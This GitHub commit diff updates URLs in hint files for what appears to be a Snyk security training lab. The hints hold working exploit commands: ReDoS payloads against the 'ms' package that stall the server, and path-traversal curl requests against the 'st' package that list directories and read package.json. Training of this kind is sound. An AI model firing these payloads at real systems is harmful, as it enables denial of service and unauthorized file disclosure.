Skip to content

Commit abf27fe

Browse files
committed
updated urls
1 parent 374d6ec commit abf27fe

File tree

8 files changed

+8
-8
lines changed

8 files changed

+8
-8
lines changed

ms/hint1.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -3,5 +3,5 @@
33
Try passing in a longer string into the content such that the pattern will take longer to match
44

55
```
6-
$ echo 'content=Buy milk in 5555555555555555555555555555555 minutes' | http --form http://localhost:3001/create -v
6+
$ echo 'content=Buy milk in 5555555555555555555555555555555 minutes' | https --form https://{your_instance}.cx.snyk.app/create -v
77
```

ms/hint2.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -3,5 +3,5 @@
33
Let’s automate the brute force by repeating an integer a large number of times:
44

55
```
6-
$ echo 'content=Buy milk in '`printf %.0s5 {1..600}`' minutes' | http --form http://localhost:3001/create -v
6+
$ echo 'content=Buy milk in '`printf %.0s5 {1..600}`' minutes' | https --form https://{your_instance}.cx.snyk.app/create -v
77
```

ms/hint3.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -3,5 +3,5 @@
33
Let’s ramp it up further. Note: You do not need to go higher than 60,000 to achieve a ReDoS.
44

55
```
6-
$ echo 'content=Buy milk in '`printf %.0s5 {1..60000}`' minutes' | http --form http://localhost:3001/create -v
6+
$ echo 'content=Buy milk in '`printf %.0s5 {1..60000}`' minutes' | https --form https://{your_instance}.cx.snyk.app/create -v
77
```

ms/hint5.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -3,5 +3,5 @@
33
To achieve catastropic backtracking, change the content string such that it’s very large and so has many combinations to back track through, and will never complete. The example we show below changes ‘minutes’ to ‘minutea’ This simple change means ms will never be able to parse the string for a time duration, but by heck will it try! You’ll see approximately a 10-15 second delay. Try to access the application from the browser and add other todos which your request is processing. You’ve just successfully exploited a ReDoS vulnerability.
44

55
```
6-
$ echo 'content=Buy milk in '`printf %.0s5 {1..60000}`' minutea' | http --form http://localhost:3001/create -v
6+
$ echo 'content=Buy milk in '`printf %.0s5 {1..60000}`' minutea' | https --form https://{your_instance}.cx.snyk.app/create -v
77
```

st/hint10.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,7 @@
33
A good starting place is the application itself. There’s a package.json file which can show you a lot of detail about how the app is constructed, which packages are installed and at which versions:
44

55
```
6-
$ curl http://localhost:3001/public/%2e%2e/package.json
6+
$ curl https://{your_instance}.cx.snyk.app/public/%2e%2e/package.json
77
```
88

99
![package.json listing](../images/image11.png)

st/hint4.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,7 @@
33
To get you started on the terminal, try the following command to access the about page. You’ll notice that the application is so versatile, the about page will pretty much look just as good in the terminal as it does in a browser!
44

55
```
6-
$ curl http://localhost:3001/public/about.html
6+
$ curl https://{your_instance}.cx.snyk.app/public/about.html
77
```
88

99
![Curl about page](../images/image4.png)

st/hint5.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -3,5 +3,5 @@
33
Try using ```../``` to break out of the public directory.
44

55
```
6-
$ curl http://localhost:3001/public/../
6+
$ curl https://{your_instance}.cx.snyk.app/public/../
77
```

st/hint9.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,7 @@
33
Try the following command:
44

55
```
6-
$ curl http://localhost:3001/public/%2e%2e/
6+
$ curl https://{your_instance}.cx.snyk.app/public/%2e%2e/
77
```
88

99
![st directory listing](../images/image2.png)

0 commit comments

Comments
 (0)